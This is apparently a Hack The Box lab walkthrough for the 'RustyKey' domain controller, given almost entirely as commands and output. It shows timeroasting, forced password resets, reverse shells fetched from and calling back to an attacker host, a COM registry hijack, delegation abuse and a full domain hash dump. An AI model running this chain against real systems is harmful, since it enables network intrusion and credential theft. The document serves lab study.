RustyKey
#hard #windows
Last updated
#hard #windows
Last updated
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-11-20 21:16:09Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-11-20T21:16:24
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51928/tcp): CLEAN (Couldn't connect)
| Check 2 (port 16739/tcp): CLEAN (Couldn't connect)
| Check 3 (port 63867/udp): CLEAN (Timeout)
| Check 4 (port 17002/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h59m59s
sudo vi /etc/hostsnxc smb 10.10.11.75
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)sudo vi /etc/hostssudo timedatectl set-ntp false
sudo ntpdate 10.10.11.75nxc smb dc.rustykey.htb -u 'rr.parker' -p '8#t5HE8L!W3A' -k --generate-krb5-file rustykey.krb
SMB dc.rustykey.htb 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.rustykey.htb 445 dc [+] rustykey.htb\rr.parker:8#t5HE8L!W3Asudo cp rustykey.krb /etc/krb5.confrusthound-ce -d rustykey.htb -u rr.parker -p '8#t5HE8L!W3A'MATCH p=(source)-[r]->(target)
WHERE (source:Computer OR source:User)
AND type(r) <> 'MemberOf'
RETURN pnxc smb 10.10.11.75 -M timeroast
SMB 10.10.11.75 445 10.10.11.75 [*] x64 (name:10.10.11.75) (domain:10.10.11.75) (signing:True) (SMBv1:False) (NTLM:False)
TIMEROAST 10.10.11.75 445 10.10.11.75 [*] Starting Timeroasting...
TIMEROAST 10.10.11.75 445 10.10.11.75 1000:$sntp-ms$a4a6976213b67421c88a8a6f99cdc149$1c0111e900000000000a5b7a4c4f434cecc9d6165d489748e1b8428bffbfcd0aecca4eb08d279b4fecca4eb08d27ed84
TIMEROAST 10.10.11.75 445 10.10.11.75 1104:$sntp-ms$90c8aa99521250c06331aaec9caf3a9b$1c0111e900000000000a5b7b4c4f434cecc9d6165cb62698e1b8428bffbfcd0aecca4eb124a57f80ecca4eb124a5e5d8
TIMEROAST 10.10.11.75 445 10.10.11.75 1103:$sntp-ms$114fa7e4680bcc034fd813bf9e8a7a40$1c0111e900000000000a5b7b4c4f434cecc9d6165f39bbe3e1b8428bffbfcd0aecca4eb12310a7edecca4eb12310e0f8
TIMEROAST 10.10.11.75 445 10.10.11.75 1105:$sntp-ms$8634a3a3405240bdc5b05d0563bf1006$1c0111e900000000000a5b7b4c4f434cecc9d6165d612c6ae1b8428bffbfcd0aecca4eb125509b23ecca4eb12550ebaa
TIMEROAST 10.10.11.75 445 10.10.11.75 1106:$sntp-ms$86e8c1751b63d9e47db6811060196359$1c0111e900000000000a5b7b4c4f434cecc9d6165b3595e4e1b8428bffbfcd0aecca4eb1273d9811ecca4eb1273de390
TIMEROAST 10.10.11.75 445 10.10.11.75 1107:$sntp-ms$03c5e9e1771e5b9a5332bf9d1aa18b12$1c0111e900000000000a5b7b4c4f434cecc9d6165bdf3153e1b8428bffbfcd0aecca4eb127e740ececca4eb127e77849
TIMEROAST 10.10.11.75 445 10.10.11.75 1118:$sntp-ms$ade0580676d624414a65c818cffeb257$1c0111e900000000000a5b7b4c4f434cecc9d6165c5d6535e1b8428bffbfcd0aecca4eb13844a97decca4eb13844e435
TIMEROAST 10.10.11.75 445 10.10.11.75 1119:$sntp-ms$6631ecbb978a9805a73b8d5f29bcd9c8$1c0111e900000000000a5b7b4c4f434cecc9d6165e79c263e1b8428bffbfcd0aecca4eb13a60fe47ecca4eb13a6149c6
TIMEROAST 10.10.11.75 445 10.10.11.75 1120:$sntp-ms$75d833ecdef7940d10313d954c43d8e9$1c0111e900000000000a5b7b4c4f434cecc9d6165ef1d59ae1b8428bffbfcd0aecca4eb13ad9132cecca4eb13ad96206
TIMEROAST 10.10.11.75 445 10.10.11.75 1122:$sntp-ms$0f0dc64933d4102bba6bba81e4deb2d9$1c0111e900000000000a5b7b4c4f434cecc9d6165dcb237fe1b8428bffbfcd0aecca4eb13dcb0043ecca4eb13dcb37a1
TIMEROAST 10.10.11.75 445 10.10.11.75 1121:$sntp-ms$00f303cbbb7718a5de3ab54faeb3bb6c$1c0111e900000000000a5b7b4c4f434cecc9d6165dc9836ce1b8428bffbfcd0aecca4eb13dc941fdecca4eb13dc9a6a7
TIMEROAST 10.10.11.75 445 10.10.11.75 1123:$sntp-ms$6abd03828c25308da037492daf7e52f6$1c0111e900000000000a5b7b4c4f434cecc9d6165c8c1a55e1b8428bffbfcd0aecca4eb14062eee2ecca4eb140634472
TIMEROAST 10.10.11.75 445 10.10.11.75 1124:$sntp-ms$5220e351203ac3fe2ec55955338d01e3$1c0111e900000000000a5b7b4c4f434cecc9d6165c8d3283e1b8428bffbfcd0aecca4eb140641985ecca4eb140644f34
TIMEROAST 10.10.11.75 445 10.10.11.75 1125:$sntp-ms$0b64d18225a20ad4d922a71047a51061$1c0111e900000000000a5b7b4c4f434cecc9d6165d9ca918e1b8428bffbfcd0aecca4eb1458c0709ecca4eb1458c6d61
TIMEROAST 10.10.11.75 445 10.10.11.75 1126:$sntp-ms$2e48f74efada3d443c934624f9cbfec4$1c0111e900000000000a5b7b4c4f434cecc9d6165d9df39be1b8428bffbfcd0aecca4eb1458d675cecca4eb1458da214
TIMEROAST 10.10.11.75 445 10.10.11.75 1127:$sntp-ms$e657fbec67cc3b3783a9c1fcb9cb12db$1c0111e900000000000a5b7b4c4f434cecc9d6165dfa72f8e1b8428bffbfcd0aecca4eb145e9f0caecca4eb145ea2827cat hashes/rusty-time | awk '{print $5}' > hashes/t
mv hashes/t hashes/rusty-timehashcat rusty-time /usr/share/wordlists/rockyou.txt --userhashcat rusty-time --user --show
1125:$sntp-ms$0b64d18225a20ad4d922a71047a51061$1c0111e900000000000a5b7b4c4f434cecc9d6165d9ca918e1b8428bffbfcd0aecca4eb1458c0709ecca4eb1458c6d61:Rusty88!cat creds.txt
IT-COMPUTER3$:Rusty88!
S-1-5-21-3316070415-896458127-4139322052-1125nxc smb dc.rustykey.htb -u IT-COMPUTER3$ -p 'Rusty88!' -k
SMB dc.rustykey.htb 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB dc.rustykey.htb 445 dc [+] rustykey.htb\IT-COMPUTER3$:Rusty88!bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k add groupMember HelpDesk 'IT-COMPUTER3$'
[+] IT-COMPUTER3$ added to HelpDeskbloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'Protected Objects' 'IT'
[+] IT removed from Protected ObjectsbloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password bb.morgan 'Password!'
[+] Password changed successfully!getTGT.py 'rustykey.htb/bb.morgan:Password!'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in bb.morgan.ccacheKRB5CCNAME=bb.morgan.ccache evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> cd ..
*Evil-WinRM* PS C:\Users\bb.morgan> cd Desktop
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> dir
Directory: C:\Users\bb.morgan\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/4/2025 9:15 AM 1976 internal.pdf
-ar--- 11/21/2025 10:02 AM 34 user.txt
*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> type user.txt*Evil-WinRM* PS C:\Users\bb.morgan\Desktop> cd \progra~1
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/26/2024 8:24 PM 7-Zip
d----- 12/26/2024 4:28 PM Common Files
d----- 6/24/2025 9:59 AM internet explorer
d----- 7/24/2025 1:09 AM VMware
d-r--- 5/30/2025 3:02 PM Windows Defender
d----- 6/24/2025 9:59 AM Windows Defender Advanced Threat Protection
d----- 11/5/2022 12:03 PM Windows Mail
d----- 6/5/2025 7:54 AM Windows Media Player
d----- 9/15/2018 12:19 AM Windows Multimedia Platform
d----- 9/15/2018 12:28 AM windows nt
d----- 11/5/2022 12:03 PM Windows Photo Viewer
d----- 9/15/2018 12:19 AM Windows Portable Devices
d----- 9/15/2018 12:19 AM Windows Security
d----- 9/15/2018 12:19 AM WindowsPowerShell*Evil-WinRM* PS C:\Program Files> reg query HKCR\CLSID /s /f "zip"
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}
(Default) REG_SZ 7-Zip Shell Extension
HKEY_CLASSES_ROOT\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
(Default) REG_SZ C:\Program Files\7-Zip\7-zip.dll
HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
(Default) REG_SZ Compressed (zipped) Folder SendTo Target
FriendlyTypeName REG_EXPAND_SZ @%SystemRoot%\system32\zipfldr.dll,-10226
HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\DefaultIcon
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}
(Default) REG_SZ Compressed (zipped) Folder Context Menu
HKEY_CLASSES_ROOT\CLSID\{b8cdcb65-b1bf-4b42-9428-1dfdb7ee92af}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}
(Default) REG_SZ Compressed (zipped) Folder Right Drag Handler
HKEY_CLASSES_ROOT\CLSID\{BD472F60-27FA-11cf-B8B4-444553540000}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\DefaultIcon
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}
(Default) REG_SZ Compressed (zipped) Folder DropHandler
HKEY_CLASSES_ROOT\CLSID\{ed9d80b9-d157-457b-9192-0e7280313bf0}\InProcServer32
(Default) REG_EXPAND_SZ %SystemRoot%\system32\zipfldr.dll
End of search: 14 match(es) found.*Evil-WinRM* PS C:\Program Files> Get-Acl "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" | fl
Path : Microsoft.PowerShell.Core\Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
Owner : BUILTIN\Administrators
Group : RUSTYKEY\Domain Users
Access : APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
BUILTIN\Administrators Allow FullControl
CREATOR OWNER Allow FullControl
RUSTYKEY\Support Allow FullControl
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadKey
Audit :
Sddl : O:BAG:DUD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;BA)(A;CIIOID;KA;;;CO)(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322052-1132)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;BA)(A;CIID;KR;;;BU)bloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k remove groupMember 'Protected Objects' 'Support'
[+] Support removed from Protected ObjectsbloodyAD -d rustykey.htb --host dc.rustykey.htb -u 'IT-COMPUTER3$' -p 'Rusty88!' -k set password ee.reed 'Password!'
[+] Password changed successfully!python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...*Evil-WinRM* PS C:\Program Files> cd \programdata
*Evil-WinRM* PS C:\programdata> wget http://10.10.14.136:8000/RunasCs.exe -o Runascs.exerlwrap nc -lnvp 9001
Listening on 0.0.0.0 9001*Evil-WinRM* PS C:\programdata> .\Runascs.exe ee.reed 'Password!' powershell -r 10.10.14.136:9001rlwrap nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.10.11.75 53111
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> msfvenom -p windows/x64/shell_reverse_tcp -f dll -o rev.dll LHOST=10.10.14.136 LPORT=1111python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...*Evil-WinRM* PS C:\programdata> wget http://10.10.14.136:8000/rev.dll -o rev.dllPS C:\Windows\system32> Set-ItemProperty "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\ProgramData\rev.dll"
Set-ItemProperty "Registry::HKCR\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\ProgramData\rev.dll"rlwrap nc -lnvp 1111
Listening on 0.0.0.0 1111rlwrap nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 10.10.11.75 55806
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>C:\Windows>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows> Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$
Set-ADComputer DC -PrincipalsAllowedToDelegateToAccount IT-COMPUTER3$PS C:\Windows> Get-ADComputer DC -Properties PrincipalsAllowedToDelegateToAccount
Get-ADComputer DC -Properties PrincipalsAllowedToDelegateToAccount
DistinguishedName : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName : dc.rustykey.htb
Enabled : True
Name : DC
ObjectClass : computer
ObjectGUID : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName : DC$
SID : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName : getST.py 'rustykey.htb/IT-COMPUTER3$:Rusty88!' -k -spn 'cifs/DC.rustykey.htb' -impersonate backupadmin
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@cifs_DC.rustykey.htb@RUSTYKEY.HTB.ccacheKRB5CCNAME=backupadmin\@cifs_DC.rustykey.htb\@RUSTYKEY.HTB.ccache secretsdump.py -k -no-pass 'rustykey.htb/backupadmin@dc.rustykey.htb'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x94660760272ba2c07b13992b57b432d4
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e3aac437da6f5ae94b01a6e5347dd920:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
RUSTYKEY\DC$:plain_password_hex:0c7fbe96b20b5afd1da58a1d71a2dbd6ac75b42a93de3c18e4b7d448316ca40c74268fb0d2281f46aef4eba9cd553bbef21896b316407ae45ef212b185b299536547a7bd796da250124a6bb3064ae48ad3a3a74bc5f4d8fbfb77503eea0025b3194af0e290b16c0b52ca4fecbf9cfae6a60b24a4433c16b9b6786a9d212c7aaefefa417fe33cc7f4dcbe354af5ce95f407220bada9b4d841a3aa7c6231de9a9ca46a0621040dc384043e19800093303e1485021289d8719dd426d164e90ee3db3914e3d378cc9e80560f20dcb64b488aa468c1b71c2bac3addb4a4d55231d667ca4ba2ad36640985d9b18128f7755b25
RUSTYKEY\DC$:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
[*] DefaultPassword
RUSTYKEY\Administrator:Rustyrc4key#!
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3c06efaf194382750e12c00cd141d275522d8397
dpapi_userkey:0xb833c05f4c4824a112f04f2761df11fefc578f5c
[*] NL$KM
0000 6A 34 14 2E FC 1A C2 54 64 E3 4C F1 A7 13 5F 34 j4.....Td.L..._4
0010 79 98 16 81 90 47 A1 F0 8B FC 47 78 8C 7B 76 B6 y....G....Gx.{v.
0020 C0 E4 94 9D 1E 15 A6 A9 70 2C 13 66 D7 23 A1 0B ........p,.f.#..
0030 F1 11 79 34 C1 8F 00 15 7B DF 6F C7 C3 B4 FC FE ..y4....{.o.....
NL$KM:6a34142efc1ac25464e34cf1a7135f34799816819047a1f08bfc47788c7b76b6c0e4949d1e15a6a9702c1366d723a10bf1117934c18f00157bdf6fc7c3b4fcfe
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f7a351e12f70cc177a1d5bd11b28ac26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f4ad30fa8d8f2cfa198edd4301e5b0f3:::
rustykey.htb\rr.parker:1137:aad3b435b51404eeaad3b435b51404ee:d0c72d839ef72c7d7a2dae53f7948787:::
rustykey.htb\mm.turner:1138:aad3b435b51404eeaad3b435b51404ee:7a35add369462886f2b1f380ccec8bca:::
rustykey.htb\bb.morgan:1139:aad3b435b51404eeaad3b435b51404ee:44c72edbf1d64dc2ec4d6d8bc24160fc:::
rustykey.htb\gg.anderson:1140:aad3b435b51404eeaad3b435b51404ee:93290d859744f8d07db06d5c7d1d4e41:::
rustykey.htb\dd.ali:1143:aad3b435b51404eeaad3b435b51404ee:20e03a55dcf0947c174241c0074e972e:::
rustykey.htb\ee.reed:1145:aad3b435b51404eeaad3b435b51404ee:4dee0d4ff7717c630559e3c3c3025bbf:::
rustykey.htb\nn.marcos:1146:aad3b435b51404eeaad3b435b51404ee:33aa36a7ec02db5f2ec5917ee544c3fa:::
rustykey.htb\backupadmin:3601:aad3b435b51404eeaad3b435b51404ee:34ed39bc39d86932b1576f23e66e3451:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:b266231227e43be890e63468ab168790:::
Support-Computer1$:1103:aad3b435b51404eeaad3b435b51404ee:5014a29553f70626eb1d1d3bff3b79e2:::
Support-Computer2$:1104:aad3b435b51404eeaad3b435b51404ee:613ce90991aaeb5187ea198c629bbf32:::
Support-Computer3$:1105:aad3b435b51404eeaad3b435b51404ee:43c00d56ff9545109c016bbfcbd32bee:::
Support-Computer4$:1106:aad3b435b51404eeaad3b435b51404ee:c52b0a68cb4e24e088164e2e5cf2b98a:::
Support-Computer5$:1107:aad3b435b51404eeaad3b435b51404ee:2f312c564ecde3769f981c5d5b32790a:::
Finance-Computer1$:1118:aad3b435b51404eeaad3b435b51404ee:d6a32714fa6c8b5e3ec89d4002adb495:::
Finance-Computer2$:1119:aad3b435b51404eeaad3b435b51404ee:49c0d9e13319c1cb199bc274ee14b04c:::
Finance-Computer3$:1120:aad3b435b51404eeaad3b435b51404ee:65f129254bea10ac4be71e453f6cabca:::
Finance-Computer4$:1121:aad3b435b51404eeaad3b435b51404ee:ace1db31d6aeb97059bf3efb410df72f:::
Finance-Computer5$:1122:aad3b435b51404eeaad3b435b51404ee:b53f4333805f80406b4513e60ef83457:::
IT-Computer1$:1123:aad3b435b51404eeaad3b435b51404ee:fe60afe8d9826130f0e06cd2958a8a61:::
IT-Computer2$:1124:aad3b435b51404eeaad3b435b51404ee:73d844e19c8df244c812d4be1ebcff80:::
IT-Computer3$:1125:aad3b435b51404eeaad3b435b51404ee:b52b582f02f8c0cd6320cd5eab36d9c6:::
IT-Computer4$:1126:aad3b435b51404eeaad3b435b51404ee:763f9ea340ccd5571c1ffabf88cac686:::
IT-Computer5$:1127:aad3b435b51404eeaad3b435b51404ee:1679431d1c52638688b4f1321da14045:::
[*] Kerberos keys grabbed
Administrator:des-cbc-md5:e007705d897310cd
krbtgt:aes256-cts-hmac-sha1-96:ee3271eb3f7047d423c8eeaf1bd84f4593f1f03ac999a3d7f3490921953d542a
krbtgt:aes128-cts-hmac-sha1-96:24465a36c2086d6d85df701553a428af
krbtgt:des-cbc-md5:d6d062fd1fd32a64
rustykey.htb\rr.parker:des-cbc-md5:8c5b3b54b9688aa1
rustykey.htb\mm.turner:aes256-cts-hmac-sha1-96:707ba49ed61c6575bfe9a3fd1541fc008e8803bfb0d7b5d21122cc464f39cbb9
rustykey.htb\mm.turner:aes128-cts-hmac-sha1-96:a252d2716a0b365649eaec02f84f12c8
rustykey.htb\mm.turner:des-cbc-md5:a46ea77c13854945
rustykey.htb\bb.morgan:des-cbc-md5:d6ef5e57a2abb93b
rustykey.htb\gg.anderson:des-cbc-md5:8923850da84f2c0d
rustykey.htb\dd.ali:des-cbc-md5:613da45e3bef34a7
rustykey.htb\ee.reed:des-cbc-md5:2fc46d9b898a4a29
rustykey.htb\nn.marcos:aes256-cts-hmac-sha1-96:53ee5251000622bf04e80b5a85a429107f8284d9fe1ff5560a20ec8626310ee8
rustykey.htb\nn.marcos:aes128-cts-hmac-sha1-96:cf00314169cb7fea67cfe8e0f7925a43
rustykey.htb\nn.marcos:des-cbc-md5:e358835b1c238661
rustykey.htb\backupadmin:des-cbc-md5:625e25fe70a77358
DC$:des-cbc-md5:915d9d52a762675d
Support-Computer1$:aes256-cts-hmac-sha1-96:89a52d7918588ddbdae5c4f053bbc180a41ed703a30c15c5d85d123457eba5fc
Support-Computer1$:aes128-cts-hmac-sha1-96:3a6188fdb03682184ff0d792a81dd203
Support-Computer1$:des-cbc-md5:c7cb8a76c76dfed9
Support-Computer2$:aes256-cts-hmac-sha1-96:50f8a3378f1d75df813db9d37099361a92e2f2fb8fcc0fc231fdd2856a005828
Support-Computer2$:aes128-cts-hmac-sha1-96:5c3fa5c32427fc819b10f9b9ea4be616
Support-Computer2$:des-cbc-md5:a2a202ec91e50b6d
Support-Computer3$:aes256-cts-hmac-sha1-96:e3b7b8876ac617dc7d2ba6cd2bea8de74db7acab2897525dfd284c43c8427954
Support-Computer3$:aes128-cts-hmac-sha1-96:1ea036e381f3279293489c19cfdeb6c1
Support-Computer3$:des-cbc-md5:c13edcfe4676f86d
Support-Computer4$:aes256-cts-hmac-sha1-96:1708c6a424ed59dedc60e980c8f2ab88f6e2bb1bfe92ec6971c8cf5a40e22c1e
Support-Computer4$:aes128-cts-hmac-sha1-96:9b6d33ef93c69721631b487dc00d3047
Support-Computer4$:des-cbc-md5:3b79647680e0d57a
Support-Computer5$:aes256-cts-hmac-sha1-96:464551486df4086accee00d3d37b60de581ee7adad2a6a31e3730fad3dfaed42
Support-Computer5$:aes128-cts-hmac-sha1-96:1ec0c93b7f9df69ff470e2e05ff4ba89
Support-Computer5$:des-cbc-md5:73abb53162d51fb3
Finance-Computer1$:aes256-cts-hmac-sha1-96:a57ce3a3e4ee34bc08c8538789fa6f99f5e8fb200a5f77741c5bf61b3d899918
Finance-Computer1$:aes128-cts-hmac-sha1-96:e62b7b772aba6668af65e9d1422e6aea
Finance-Computer1$:des-cbc-md5:d9914cf29e76f8df
Finance-Computer2$:aes256-cts-hmac-sha1-96:4d45b576dbd0eab6f4cc9dc75ff72bffe7fae7a2f9dc50b5418e71e8dc710703
Finance-Computer2$:aes128-cts-hmac-sha1-96:3fd0dd200120ca90b43af4ab4e344a78
Finance-Computer2$:des-cbc-md5:23ef512fb3a8d37c
Finance-Computer3$:aes256-cts-hmac-sha1-96:1b2280d711765eb64bdb5ab1f6b7a3134bc334a3661b3335f78dd590dee18b0d
Finance-Computer3$:aes128-cts-hmac-sha1-96:a25859c88f388ae7134b54ead8df7466
Finance-Computer3$:des-cbc-md5:2a688a43ab40ecba
Finance-Computer4$:aes256-cts-hmac-sha1-96:291adb0905f3e242748edd1c0ecaab34ca54675594b29356b90da62cf417496f
Finance-Computer4$:aes128-cts-hmac-sha1-96:81fed1f0eeada2f995ce05bbf7f8f951
Finance-Computer4$:des-cbc-md5:6b7532c83bc84c49
Finance-Computer5$:aes256-cts-hmac-sha1-96:6171c0240ae0ce313ecbd8ba946860c67903b12b77953e0ee38005744507e3de
Finance-Computer5$:aes128-cts-hmac-sha1-96:8e6aa26b24cdda2d7b5474b9a3dc94dc
Finance-Computer5$:des-cbc-md5:92a72f7f865bb6cd
IT-Computer1$:aes256-cts-hmac-sha1-96:61028ace6c840a6394517382823d6485583723f9c1f98097727ad3549d833b1e
IT-Computer1$:aes128-cts-hmac-sha1-96:7d1a98937cb221fee8fcf22f1a16b676
IT-Computer1$:des-cbc-md5:019d29370ece8002
IT-Computer2$:aes256-cts-hmac-sha1-96:e9472fb1cf77df86327e5775223cf3d152e97eebd569669a6b22280316cf86fa
IT-Computer2$:aes128-cts-hmac-sha1-96:a80fba15d78f66477f0591410a4ffda7
IT-Computer2$:des-cbc-md5:622f2ae961abe932
IT-Computer3$:aes256-cts-hmac-sha1-96:7871b89896813d9e4a732a35706fe44f26650c3da47e8db4f18b21cfbb7fbecb
IT-Computer3$:aes128-cts-hmac-sha1-96:0e14a9e6fd52ab14e36703c1a4c542e3
IT-Computer3$:des-cbc-md5:f7025180cd23e5f1
IT-Computer4$:aes256-cts-hmac-sha1-96:68f2e30ca6b60ec1ab75fab763087b8772485ee19a59996a27af41a498c57bbc
IT-Computer4$:aes128-cts-hmac-sha1-96:181ffb2653f2dc5974f2de924f0ac24a
IT-Computer4$:des-cbc-md5:bf58cb437340cd3d
IT-Computer5$:aes256-cts-hmac-sha1-96:417a87cdc95cb77997de6cdf07d8c9340626c7f1fbd6efabed86607e4cfd21b8
IT-Computer5$:aes128-cts-hmac-sha1-96:873fd89f24e79dcd0affe6f63c51ec9a
IT-Computer5$:des-cbc-md5:ad5eec6bcd4f86f7
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistrynxc smb 10.10.11.75 -u administrator -H f7a351e12f70cc177a1d5bd11b28ac26 -k
SMB 10.10.11.75 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.10.11.75 445 dc [+] rustykey.htb\administrator:f7a351e12f70cc177a1d5bd11b28ac26 (Pwn3d!)nxc smb 10.10.11.75 -u administrator -p 'Rustyrc4key#!' -k
SMB 10.10.11.75 445 dc [*] x64 (name:dc) (domain:rustykey.htb) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.10.11.75 445 dc [+] rustykey.htb\administrator:Rustyrc4key#! (Pwn3d!)psexec.py -k 'rustykey.htb/administrator:Rustyrc4key#!@dc.rustykey.htb'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc.rustykey.htb.....
[*] Found writable share ADMIN$
[*] Uploading file AiKNtguE.exe
[*] Opening SVCManager on dc.rustykey.htb.....
[*] Creating service radZ on dc.rustykey.htb.....
[*] Starting service radZ.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands [-] CCache file is not found. Skipping...
